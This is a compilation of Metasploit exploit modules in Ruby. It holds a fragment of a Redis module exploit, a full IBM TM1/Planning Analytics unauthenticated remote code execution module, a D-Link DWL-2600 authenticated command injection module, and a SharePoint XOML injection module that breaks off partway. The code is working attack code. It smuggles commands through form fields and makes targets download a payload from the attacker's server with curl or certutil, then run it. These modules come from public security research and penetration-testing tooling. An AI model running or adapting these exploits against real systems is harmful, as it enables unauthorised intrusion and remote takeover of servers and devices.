# def generate_code_file(buf) template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb')) File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))} end def compile_payload make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile') vprint_status("Clean old files") vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|) vprint_status(%x|make -C #{File.dirname(make_file)} clean|) print_status('Compile redis module extension file') res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true| if res.include? 'true' print_good("Payload generated successfully! ") else print_error(res) fail_with(Failure::BadConfig, 'Check config of gcc compiler.') end end # # check the environment for compile payload to so file. # def check_env # check if linux return false unless %x|uname -s 2>/dev/null|.include? "Linux" # check if gcc installed return false unless %x|command -v gcc && echo true|.include? "true" # check if ld installed return false unless %x|command -v ld && echo true|.include? "true" true end def check_custom return @custom_payload if @custom_payload @custom_payload = false @custom_payload = true if check_env && datastore['CUSTOM'] @custom_payload end def module_file return @module_file if @module_file @module_file = datastore['RedisModuleName'] || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so" end def create_payload p = payload.encoded Msf::Simple::Buffer.transform(p, 'c', 'buf') end def payload_bin return @payload_bin if @payload_bin if check_custom @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so')) else @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp', 'exp.so')) end @payload_bin end end
-
IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "IBM TM1 / Planning Analytics Unauthenticated Remote Code Execution", 'Description' => %q{ This module exploits a vulnerability in IBM TM1 / Planning Analytics that allows an unauthenticated attacker to perform a configuration overwrite. It starts by querying the Admin server for the available applications, picks one, and then exploits it. You can also provide an application name to bypass this step, and exploit the application directly. The configuration overwrite is used to change an application server authentication method to "CAM", a proprietary IBM auth method, which is simulated by the exploit. The exploit then performs a fake authentication as admin, and finally abuses TM1 scripting to perform a command injection as root or SYSTEM. Testing was done on IBM PA 2.0.6 and IBM TM1 10.2.2 on Windows and Linux. Versions up to and including PA 2.0.8 are vulnerable. It is likely that versions earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014). 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <[email protected]>', # Vulnerability discovery and Metasploit module 'Gareth Batchelor <[email protected]>' # Real world exploit testing and feedback ], 'References' => [ [ 'CVE', '2019-4716' ], [ 'URL', 'https://www.ibm.com/support/pages/node/1127781' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-tm1-rce.txt' ], [ 'URL', 'https://seclists.org/fulldisclosure/2020/Mar/44' ] ], 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Windows (Command)', { 'Platform' => 'win', 'Arch' => [ARCH_CMD], 'Payload' => { # Plenty of bad chars in Windows... there might be more lurking 'BadChars' => "\x25\x26\x27\x3c\x3e\x7c", } } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Linux (Command)', { 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'Payload' => { # only one bad char in Linux, baby! (that we know of...) 'BadChars' => "\x27", } } ], [ 'AIX (Command)', { # This should work on AIX, but it was not tested! 
'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'Payload' => { # untested, but assumed to be similar to Linux 'BadChars' => "\x27", } } ], ], 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground 'DefaultOptions' => { # give the target lots of time to download the payload 'WfsDelay' => 30, }, 'Privileged' => true, 'DisclosureDate' => "Dec 19 2019", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5498), OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), ]) register_advanced_options [ OptString.new('APP_NAME', [false, 'Name of the target application']), OptInt.new('AUTH_ATTEMPTS', [true, "Number of attempts to auth to CAM server", 10]), ] end ## Packet structure start # these are client message types MSG_TYPES = { :auth => [ 0x0, 0x1 ], :auth_uniq => [ 0x0, 0x3 ], :auth_1001 => [ 0x0, 0x4 ], :auth_cam_pass => [ 0x0, 0x8 ], :auth_dist => [ 0x0, 0xa ], :obj_register => [ 0, 0x21 ], :obj_prop_set => [ 0, 0x25 ], :proc_create => [ 0x0, 0x9c ], :proc_exec => [ 0x0, 0xc4 ], :get_config => [ 0x1, 0x35 ], :upd_clt_pass => [ 0x1, 0xe2 ], :upd_central => [ 0x1, 0xae ], } # packet header is universal for both client and server PKT_HDR = [ 0, 0, 0xff, 0xff ] # pkt end marker (client only, server responses do not have it) PKT_END = [ 0xff, 0xff ] # empty auth object, used for operations that do not require auth AUTH_OBJ_EMPTY = [ 5, 3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ] # This is actually the client version number # 0x6949200 = 110400000 in decimal, or version 11.4 # The lowest that version 11.4 seems to accept is 8.4, so leave that as the default # 8.4 = 0x4CACE80 # 9.1 = 0x55ED120 # 9.4 = 0x5636500 # 10.1 = 0x5F767A0 # 10.4 = 0x5FBFB80 # 11.1 = 0x68FFE20 # 11.4 = 0x6949200 # # If something doesn't work, try using one of the values above, but bear in mind this module # was tested on 10.2.2 and 11.4, VERSION = [ 0x03, 0x04, 0xca, 0xce, 0x80 ] ## Packet structure end ## Network primitives start # unpack a string (hex string to 
array of bytes) def str_unpack(str) arr = [] str.scan(/../).each do |b| arr += [b].pack('H*').unpack('C*') end arr end # write strings directly to socket; each 2 string chars are a byte def sock_rw_str(sock, msg_str) sock_rw(sock, str_unpack(msg_str)) end # write array to socket and get result # wait should also be implemented in msf def sock_rw(sock, msg, ignore = false, wait = 0) sock.write(msg.pack('C*')) if not ignore sleep(wait) recv_sz = sock.read(2).unpack('H*')[0].to_i(16) bytes = sock.read(recv_sz-2).unpack('H*')[0] bytes end end def sock_r(sock) recv_sz = sock.read(2).unpack('H*')[0].to_i(16) bytes = sock.read(recv_sz-2).unpack('H*')[0] bytes end def get_socket(app_host, app_port, ssl = 0) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp( { 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 } ) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError sock.close if sock end if sock.nil? 
fail_with(Failure::Unknown, 'Failed to connect to the chosen application') end if ssl == 1 # also need to add support for old ciphers ctx = OpenSSL::SSL::SSLContext.new ctx.min_version = OpenSSL::SSL::SSL3_VERSION ctx.security_level = 0 ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE s = OpenSSL::SSL::SSLSocket.new(sock, ctx) s.sync_close = true s.connect return s end return sock end ## Network primitives end ## Packet primitives start def pack_sz(sz) [sz].pack('n*').unpack('C*') end # build a packet, ready to send def pkt_build(msg_type, auth_obj, contents) pkt = PKT_HDR + msg_type + auth_obj + contents + PKT_END pack_sz(pkt.length + 2) + pkt end # extracts the first object from a server response def obj_extract(res) arr = str_unpack(res) # ignore packet header (4 bytes) arr.shift(PKT_HDR.length) if arr[0] == 5 # this is an object, get the type (1 byte) plus the object bytes (9 bytes) obj = Array.new obj = arr[0..9] obj end end # adds a string to a packet # C string = 0x2; utf string = 0xe; binary = 0xf def stradd(str, type = 0xe) arr = [ type ] # string type arr += pack_sz(str.length) arr += str.unpack('C*') arr end # packs binary data into an array def datapack(data) arr = [] data.chars.each do |d| arr << d.ord end arr end def binadd(data) arr = [ 0xf ] # binary type 0xf arr += pack_sz(data.length) # 2 byte size arr += datapack(data) # ... 
and add the data end def get_str(data) s = "" while data[0] != '"'.ord data.shift end data.shift while data[0] != '"'.ord s += data[0].chr data.shift end # comma data.shift s end # This fetches the current IntegratedSecurityMode from a packet such as # 0000ffff070000000203000000 01 07000000020e00000e0000 (1) # 0000ffff070000000203000000 02 07000000020e00000e00084b65726265726f73 (2) # 0000ffff070000000203000000 06 07000000010e0000 (6) def get_auth(data) # make it into an array data = str_unpack(data) if data.length > 13 # skip 13 bytes (header + array indicator + index indicator) data.shift(13) # fetch the auth method byte data[0] end end def update_auth(auth_method, restore = false) # first byte of data is ignored, so add an extra space if restore srv_config = " IntegratedSecurityMode=#{auth_method}" else # To enable CAM server authentication over SSL, the CAM server certificate has to be previously # imported into the server. Since we can't do this, disable SSL in the fake CAM. srv_config = " IntegratedSecurityMode=#{auth_method}\n" + "ServerCAMURI=http://#{srvhost}:#{srvport}\n" + "ServerCAMURIRetryAttempts=10\nServerCAMIPVersion=ipv4\n" + "CAMUseSSL=F\n" end arr = [ 3 ] + [ 0, 0, 0, 2 ] + # no idea what this index is [ 3 ] + [ 0, 0, 0, 2 ] + # same here [ 3 ] + [ 0 ] * 4 + # same here stradd(rand_text_alpha(5..12)) + # same here... 
stradd("tm1s_delta.cfg") + # update file name binadd(srv_config) + # file data stradd(rand_text_alpha(0xf)) # last sync timestamp, max len 0xf upd_auth = pkt_build( MSG_TYPES[:upd_central], AUTH_OBJ_EMPTY, [ 7 ] + # array type [ 0, 0, 0, 7 ] + # array len (fixed size of 7 for this pkt) arr ) upd_auth end ## Packet primitives end ## CAM HTTP functions start def on_request_uri(cli, request) xml_res = %{<?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="http://developer.cognos.com/schemas/dataSourceCommandBlock/1/" xmlns:bus="http://developer.cognos.com/schemas/bibus/3/" xmlns:cm="http://developer.cognos.com/schemas/contentManagerService/1" xmlns:ns10="http://developer.cognos.com/schemas/indexUpdateService/1" xmlns:ns11="http://developer.cognos.com/schemas/jobService/1" xmlns:ns12="http://developer.cognos.com/schemas/metadataService/1" xmlns:ns13="http://developer.cognos.com/schemas/mobileService/1" xmlns:ns14="http://developer.cognos.com/schemas/monitorService/1" xmlns:ns15="http://developer.cognos.com/schemas/planningAdministrationConsoleService/1" xmlns:ns16="http://developer.cognos.com/schemas/planningRuntimeService/1" xmlns:ns17="http://developer.cognos.com/schemas/planningTaskService/1" xmlns:ns18="http://developer.cognos.com/schemas/reportService/1" xmlns:ns19="http://developer.cognos.com/schemas/systemService/1" xmlns:ns2="http://developer.cognos.com/schemas/agentService/1" xmlns:ns3="http://developer.cognos.com/schemas/batchReportService/1" xmlns:ns4="http://developer.cognos.com/schemas/dataIntegrationService/1" xmlns:ns5="http://developer.cognos.com/schemas/dataMovementService/1" xmlns:ns6="http://developer.cognos.com/schemas/deliveryService/1" xmlns:ns7="http://developer.cognos.com/schemas/dispatcher/1" 
xmlns:ns8="http://developer.cognos.com/schemas/eventManagementService/1" xmlns:ns9="http://developer.cognos.com/schemas/indexSearchService/1"> <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <cm:queryResponse> <result baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]"> PLACEHOLDER </result> </cm:queryResponse> </SOAP-ENV:Body> </SOAP-ENV:Envelope>} session = %Q{ <item xsi:type="bus:session"> <identity> <value baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]"> <item xsi:type="bus:account"> <searchPath><value>admin</value></searchPath> </item> </value> </identity> </item>} account = %Q{ <item xsi:type="bus:account"> <defaultName><value>admin</value></defaultName> </item>} headers = { "SOAPAction" => '"http://developer.cognos.com/schemas/contentManagerService/1"'} if request.body.include? "<searchPath>/</searchPath>" print_good("CAM: Received first CAM query, responding with account info") response = xml_res.sub('PLACEHOLDER', account) elsif request.body.include? "<searchPath>~~</searchPath>" print_good("CAM: Received second CAM query, responding with session info") response = xml_res.sub('PLACEHOLDER', session) elsif request.body.include? 
"<searchPath>admin</searchPath>" print_good("CAM: Received third CAM query, responding with random garbage") response = rand_text_alpha(5..12) elsif request.method == "GET" print_good("CAM: Received request for payload executable, shell incoming!") response = @pl headers = { "Content-Type" => "application/octet-stream" } else response = '' print_error("CAM: received unknown request") end send_response(cli, response, headers) end ## CAM HTTP functions end def restore_auth(app, auth_current) print_status("Restoring original authentication method #{auth_current}") upd_cent = update_auth(auth_current, true) s = get_socket(app[2], app[3], app[5]) sock_rw(s, upd_cent, true) s.close end def exploit # first let's check if SRVHOST is valid if datastore['SRVHOST'] == "0.0.0.0" fail_with(Failure::Unknown, "Please enter a valid IP address for SRVHOST") end # The first step is to query the administrative server to see what apps are available. # This action can be done unauthenticated. We then list all the available app servers # and pick a random one that is currently accepting clients. This step is important # not only to know what app servers are available, but also to know if we need to use # SSL or not. # The admin server is usually at 5498 using SSL. Non-SSL access is disabled by default, but when enabled, it's available at port 5495 # # Step 1: fetch the available applications / servers from the Admin server # ... if the user did not enter an APP_NAME if datastore['APP_NAME'].nil? connect print_status("Connecting to admin server and obtaining application data") # for this packet we use string type 0xc (?) 
and cut off the PKT_END pkt_control = PKT_HDR + [0] + stradd(lhost, 0xc) pkt_control = pack_sz(pkt_control.length + 2) + pkt_control data = sock_rw(sock, pkt_control) disconnect if data # now process the response apps = [] data = str_unpack(data) # ignore packet header (4 bytes) data.shift(PKT_HDR.length) # now just go through the list we received, sample format below # "24retail","tcp","10.11.12.123","17414","1460","1","127.0.0.1,127.0.0.1,127.0.0.1","1","0","","","","0","","0","","ipv4","22","0","2","http://centos7.doms.com:8014","8014" # "GO_New_Stores","tcp","10.11.12.123","45557","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","23","0","2","https://centos7.doms.com:5010","5010" # "GO_Scorecards","tcp","10.11.12.123","44321","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:44312","44312" # "Planning Sample","tcp","10.11.12.123","12345","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:12354","12354" # "proven_techniques","tcp","10.11.12.123","53333","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:5011","5011" # "SData","tcp","10.11.12.123","12346","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:8010","8010" while data != nil and data.length > 2 # skip the marker (0x0, 0x5) that indicates the start of a new app data = data[2..-1] # read the size and fetch the data size = (data[0..1].pack('C*').unpack('H*')[0].to_i(16)) data_next = data[2+size..-1] data = data[2..size] # first is application name app_name = get_str(data) # second is protocol, we don't care proto = get_str(data) # third is IP address ip = get_str(data) # app port port = get_str(data) # mtt maybe? 
don't care mtt = get_str(data) # not sure, and don't care unknown = get_str(data) # localhost addresses? again don't care unknown_addr = get_str(data) # I think this is the accepting clients flag accepts = get_str(data) # and this is a key one, the SSL flag ssl = get_str(data) # the leftover data is related to the REST API *I think*, so we just ignore it print_good("Found app #{app_name} #{proto} ip: #{ip} port: #{port} available: #{accepts} SSL: #{ssl}") apps.append([app_name, proto, ip, port.to_i, accepts.to_i, ssl.to_i]) data = data_next end else fail_with(Failure::Unknown, 'Failed to obtain application data from the admin server') end # now pick a random application server that is accepting clients via TCP app = apps.sample total = apps.length count = 0 # TODO: check for null return here, and probably also response size > 0x20 while app[1] != "tcp" and app[4] != 1 and count < total app = apps.sample count += 1 end if count == total fail_with(Failure::Unknown, 'Failed to find an application we can attack') end print_status("Picked #{app[0]} as our target, connecting...") else # else if the user entered an APP_NAME, build the app struct with that info ssl = datastore['SSL'] app = [datastore['APP_NAME'], 'tcp', rhost, rport, 1, (ssl ? 1 : 0)] print_status("Attacking #{app[0]} on #{peer} as requested with TLS #{ssl ? "on" : "off"}") end s = get_socket(app[2], app[3], app[5]) # Step 2: get the current app server configuration variables, such as the current auth method used get_conf = stradd(app[0]) get_conf += VERSION auth_get = pkt_build(MSG_TYPES[:get_config], AUTH_OBJ_EMPTY, get_conf) data = sock_rw(s, auth_get) auth_current = get_auth(data) print_good("Current auth method is #{auth_current}, we're good to go!") s.close # Step 3: start the fake CAM server / exploit server if payload.arch.include? ARCH_CMD @pl = '' else @pl = generate_payload_exe end # do not use SSL for the CAM server! 
if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end print_status("Starting up the fake CAM server...") start_service( { 'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => '/' }, } ) datastore['SSL'] = true if ssl_restore # Step 4: send the server config update packet, and ignore what it sends back print_status("Changing authentication method to 4 (CAM auth)") upd_cent = update_auth(4) s = get_socket(app[2], app[3], app[5]) sock_rw(s, upd_cent, true) s.close # Step 5: send the CAM auth request and obtain the authentication object # app name auth_pkt = stradd(app[0]) auth_pkt += [ 0x7, 0, 0, 0, 3 ] # array with 3 objects # passport, can be random auth_pkt += stradd(rand_text_alpha(5..12)) # no idea what these vars are, but they don't seem to matter auth_pkt += stradd(rand_text_alpha(5..12)) auth_pkt += stradd(rand_text_alpha(5..12)) # client IP auth_pkt += stradd(lhost) # add the client version number auth_pkt += VERSION auth_dist = pkt_build(MSG_TYPES[:auth_cam_pass], AUTH_OBJ_EMPTY, auth_pkt) print_status("Authenticating using CAM Passport and our fake CAM Service...") s = get_socket(app[2], app[3], app[5]) # try to authenticate up to AUTH_ATTEMPT times, but usually it works the first try # adjust the 4th parameter to sock_rw to increase the timeout if it's not working and / or the CAM server is on another network counter = 1 res_auth = '' while(counter < datastore['AUTH_ATTEMPTS']) # send the authenticate request, but wait a bit so that our fake CAM server can respond res_auth = sock_rw(s, auth_dist, false, 0.5) if res_auth.length < 20 print_error("Failed to authenticate on attempt number #{counter}, trying again...") counter += 1 next else break end end if counter == datastore['AUTH_ATTEMPTS'] # if we can't auth, bail out, but first restore the old auth method s.close #restore_auth(app, auth_current) fail_with(Failure::Unknown, "Failed to authenticate to the Application server. 
Run the exploit and try again!") end auth_obj = obj_extract(res_auth) # Step 6: create a Process object print_status("Creating our Process object...") proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:proc_create], auth_obj, []))) if payload.arch == ["cmd"] cmd_one = payload.encoded cmd_two = '' else payload_url = "http://#{srvhost}:#{srvport}/" exe_name = rand_text_alpha(5..13) if target['Platform'] == 'win' # the Windows command has to be split amongst two lines; the & char cannot be used to execute two processes in one line exe_name += ".exe" exe_name = "C:\\Windows\\Temp\\" + exe_name cmd_one = "certutil.exe -urlcache -split -f #{payload_url} #{exe_name}" cmd_two = exe_name else # the Linux one can actually be done in one line, but let's make them similar exe_name = "/tmp/" + exe_name cmd_one = "curl #{payload_url} -o #{exe_name};" cmd_two = "chmod +x #{exe_name}; exec #{exe_name}" end register_file_for_cleanup(exe_name) end proc_cmd = [ 0x3, 0, 0, 2, 0x3c ] + # no idea what this index is [ 0x7, 0, 0, 0, 2 ] + # array with 2 objects (2 line script) # the first argument is the command # the second whether it should wait (1) or not (0) for command completion before returning stradd("executecommand('#{cmd_one}', #{cmd_two.empty? ? "0" : "1"});") + stradd("executecommand('#{cmd_two}', 0);") # Step 7: add the commands into the process object print_status("Adding command: \"#{cmd_one}\" to the Process object...") if cmd_two != '' print_status("Adding command: \"#{cmd_two}\" to the Process object...") end sock_rw(s, pkt_build(MSG_TYPES[:obj_prop_set], [], proc_obj + proc_cmd)) # Step 8: register the Process object with a random name obj_name = rand_text_alpha(5..12) print_status("Registering the Process object under the name '#{obj_name}'") proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:obj_register], auth_obj, proc_obj + stradd(obj_name)))) # Step 9: execute the Process! 
print_status("Now let's execute the Process object!") sock_rw(s, pkt_build(MSG_TYPES[:proc_exec], [], proc_obj + [ 0x7 ] + [ 0 ] * 4), true) s.close # Step 10: restore the auth method and enjoy the shell! restore_auth(app, auth_current) if payload.arch.include? ARCH_CMD print_good("Your command should have executed by now, enjoy!") end end end
-
DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)
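##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Authenticated OS command injection in the D-Link DWL-2600 web interface
# (CVE-2019-20499).
#
# Flow: a form login against admin.cgi, then the session token is read out of
# the `var cookieValue = "...";` JavaScript snippet in the login response, and
# finally the `config_restore` action is abused: the multipart field
# `configServerip` is evidently interpolated into a shell command on the
# device, so a value of "; <cmd> ;" runs <cmd>. Everything travels over plain
# HTTP with whatever credentials are configured (default admin/admin), i.e.
# this is post-auth RCE, not an authentication bypass.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DLINK DWL-2600 Authenticated Remote Command Injection',
      'Description'    => %q{
        Some DLINK Access Points are vulnerable to an authenticated OS command injection.
        Default credentials for the web interface are admin/admin.
      },
      'Author'         =>
        [
          'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
          'Nick Starke'       # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-20499' ],
          [ 'EDB', '46841' ]
        ],
      'DisclosureDate' => 'May 15 2019',
      'Privileged'     => true,
      'Platform'       => %w{ linux unix },
      'Payload'        =>
        {
          'DisableNops' => true,
          'BadChars'    => "\x00"
        },
      'CmdStagerFlavor' => :wget,
      'Targets'        =>
        [
          [ 'CMD',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [ 'Linux mips Payload',
            {
              'Arch'     => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1
    ))

    register_options(
      [
        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
        OptString.new('TARGETURI',    [ true, 'Base path to the Dlink web interface', '/' ])
      ])
  end

  # Run one command through the configServerip injection point.
  #
  # Called once for the CMD target and repeatedly by the CmdStager mixin for
  # the native target (the mixin passes +opts+, which this module ignores).
  # Requires @token to have been set by #exploit.
  #
  # Aborts with Failure::UnexpectedReply when the device sends no response or
  # a non-200 status. On a connection error it logs and returns nil so the
  # caller (the stager) can decide what to do.
  def execute_command(cmd, opts = {})
    # configRestore only needs to be present and non-empty for the action to run.
    bogus = Rex::Text.rand_text_alpha(rand(1..10))

    post_data = Rex::MIME::Message.new
    post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
    post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
    # The surrounding ';' terminate whatever command the firmware builds around this value.
    post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")

    print_status("Sending CGI payload using token: #{@token}") # @token is populated by #exploit

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'admin.cgi'),
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => "sessionHTTP=#{@token};",
      'data'   => post_data.to_s,
      'query'  => 'action=config_restore'
    })

    # The original condition was `unless res || res.code != 200`: it raised
    # NoMethodError when res was nil and never failed on a non-200 reply.
    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
    end
  rescue ::Rex::ConnectionError
    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
    return
  end

  # Log in, harvest the session token from the login page, then deliver the
  # payload either as a single command (CMD target) or via the wget stager.
  def exploit
    user  = datastore['HttpUsername']
    pass  = datastore['HttpPassword']
    rhost = datastore['RHOST']
    rport = datastore['RPORT']

    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")

    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'admin.cgi'),
      'method'    => 'POST',
      'vars_post' => {
        'i_username' => user,
        'i_password' => pass,
        'login'      => 'Logon'
      }
    })

    unless res && res.code != 404
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
    end

    unless [200, 301, 302].include?(res.code)
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
    end

    print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")

    # The token is embedded in the page as:  var cookieValue = "<token>";
    # Both index lookups are guarded: a page without that snippet (bad
    # credentials, different firmware build) used to crash here with
    # NoMethodError on nil instead of failing cleanly.
    delstart    = 'var cookieValue = "'
    body        = res.body.to_s
    tokenstart  = body.index(delstart)
    tokenoffset = tokenstart.nil? ? nil : tokenstart + delstart.size
    endoffset   = tokenoffset.nil? ? nil : body.index('";', tokenoffset)
    @token      = endoffset.nil? ? '' : body[tokenoffset, endoffset - tokenoffset]

    if @token.empty?
      fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
    end

    print_good("#{peer} - Received Auth token: #{@token}")

    if target.name =~ /CMD/
      unless datastore['CMD']
        fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      execute_command(payload.encoded)
    else
      # linemax/noconcat kept from the original; presumably bounded by what the
      # CGI accepts per form field - not verified here.
      execute_cmdstager(linemax: 100, noconcat: true)
    end
  end
end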
-
SharePoint Workflows - XOML Injection (Metasploit)
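# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

# SharePoint Workflows XOML injection (CVE-2020-0646).
#
# The SOAP method ValidateWorkflowMarkupAndCreateSupportObjects on
# _vti_bin/webpartpages.asmx compiles caller-supplied XOML into C#. The
# InterfaceType attribute of a CallExternalMethodActivity is pasted into that
# generated source, so a value that closes the type name and opens a new
# statement runs arbitrary code (here
# System.Diagnostics.Process.Start("cmd.exe", "/c ...")). The request is sent
# with USERNAME/PASSWORD/DOMAIN, i.e. this is authenticated RCE, not an
# authentication bypass.
#
# Operational caveat: #check is not passive. It pushes an `echo <random>`
# command through the same code path and classifies the host by the compiler
# errors in the reply, so even a check run leaves a process-creation event and
# request logs on the target (see 'SideEffects').
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SharePoint Workflows XOML Injection',
      'Description'    => %q{
        This module exploits a vulnerability within SharePoint and its .NET backend
        that allows an attacker to execute commands using specially crafted XOML
        data sent to SharePoint via the Workflows functionality.
      },
      'Author'         =>
        [
          'Spencer McIntyre',
          'Soroush Dalili'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2020-0646'],
          ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
          [ 'Windows Command',     { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
          [ 'Windows Powershell',  { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_powershell } ]
        ],
      'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true },
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2020-03-02',
      'Notes'          => {
        'Stability'   => [CRASH_SAFE,],
        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
        'Reliability' => [REPEATABLE_SESSION],
      },
      'Privileged'     => true
    ))

    register_options([
      OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
    ])
  end

  # Execute `echo <random>` through the vulnerable method and classify the
  # host from the compiler errors that come back. This runs code on the target
  # (see the class comment).
  def check
    res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
    return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200

    compiler_errors = extract_compiler_errors(res)
    # extract_compiler_errors returns nil when nothing could be parsed; the
    # original `compiler_errors&.length > 0` raised NoMethodError on that nil
    # instead of reporting Unknown.
    return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors && compiler_errors.length > 0

    # once patched you get a specific compiler error message about the type name
    return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/

    CheckCode::Vulnerable
  end

  # Pull the CompilerError/@Text attributes out of a SOAP response.
  #
  # The result payload is XML embedded as text inside the
  # ...SupportObjectsResult element, hence the second parse. Returns a
  # Nokogiri node set, or nil when the response is not a 200 or carries no
  # result element.
  def extract_compiler_errors(res)
    return nil unless res&.code == 200

    xml_doc = res.get_xml_document
    result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
    return nil if result.length == 0

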